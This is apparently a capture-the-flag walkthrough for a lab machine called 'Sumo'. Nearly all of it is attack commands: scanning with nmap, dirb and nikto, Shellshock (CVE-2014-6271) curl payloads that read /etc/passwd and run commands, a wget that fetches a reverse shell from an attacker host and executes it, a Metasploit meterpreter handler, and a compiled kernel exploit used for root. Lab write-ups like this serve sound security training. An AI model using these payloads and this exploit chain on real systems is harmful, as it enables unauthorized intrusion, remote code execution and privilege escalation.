Sumo Walkthrough

Start scanning the target with nmap –A –T4 –p- 192.168.1.10 –vv

Then dirb http://192.168.1.10 /usr/share/dirb/wordlist/big.txt

Didn’t get much from it, so i decided to run nikto –h 192.168.1.10

The target has a vulnerability CVE-2014-6271 google it and found out it’s a shellshock vulnerability and there is a away to view the target passwd file:

curl -A ‘() { :;}; echo “Contetn-Type : text/plain”; echo; /bin/cat /etc/passwd’ http://192.168.1.10/cgi-bin/test

Also to view the user id curl -A ‘() { :;}; echo “Contetn-Type : text/plain”; echo; /usr/bin/id’ http://192.168.1.10/cgi-bin/test

Now let’s create a reverse shell and try to upload it to the target:

Then upload the shell file to the target:

curl -A ‘() { :;}; echo “Contetn-Type : text/plain”; echo; /usr/bin/wget http://192.168.1.8/shell -P /tmp’ http://192.168.1.10/cgi-bin/test

curl -A ‘() { :;}; echo “Contetn-Type : text/plain”; echo; /bin/ls -la /tmp’ http://192.168.1.10/cgi-bin/test

curl -A ‘() { :;}; echo “Contetn-Type : text/plain”; echo; /bin/chmod +x “/tmp/shell”‘ http://192.168.1.10/cgi-bin/test

curl -A ‘() { :;}; echo “Contetn-Type : text/plain”; echo; /bin/bash -c “/tmp/shell”‘ http://192.168.1.10/cgi-bin/test

At the same time start Metasploit and set it up like this:

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set lhost 192.168.1.8

set lport 4444

And we got a shell back, now let’s see what’s the version and kernel of this box:

Let’s search these output with searchsploit:

locate 33589.c

cp /usr/share/exploitdb/exploits/linux_x86-64/local/33589.c ~/vnik.c

Then transfer it to the target using wget http://192.168.1.8/vnik.c

gcc vnik.c -O2 -o vnik

uname -r

./vnik 0

And when you get root privilege catch the flag on the /root directory: